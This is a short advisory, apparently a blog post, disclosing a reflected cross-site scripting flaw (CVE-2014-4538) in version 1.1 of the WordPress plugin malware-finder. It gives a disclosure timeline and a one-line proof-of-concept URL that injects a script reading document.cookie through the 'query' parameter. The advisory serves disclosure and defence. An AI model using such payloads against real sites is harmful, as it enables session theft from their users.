wp-plugin : malware-finder – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : malware-finder

 

Effected Version : 1.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

PoC:
http://localhost/wordpress/wp-content/wp-plugs/malwarefinder/process.php?query=query%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 

Vulnerable Parameter : query

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4538

 
Plugin Description :
 
Malware is a huge challenge in managing a Wordpress blog, not to mention that it can take hours to find where malicious code is hiding. But most likely you have access to at least one file (i.e. your homepage) that has been infected with malicious code.  Just paste a small piece of that code below and the plugin will search through your entire Wordpress installation, providing the EXACT locations of the infected files!  Please note that you WILL NOT be able to use this plugin if you are UNABLE to access your Wordpress Dashboard.

Leave a Reply

Your email address will not be published. Required fields are marked *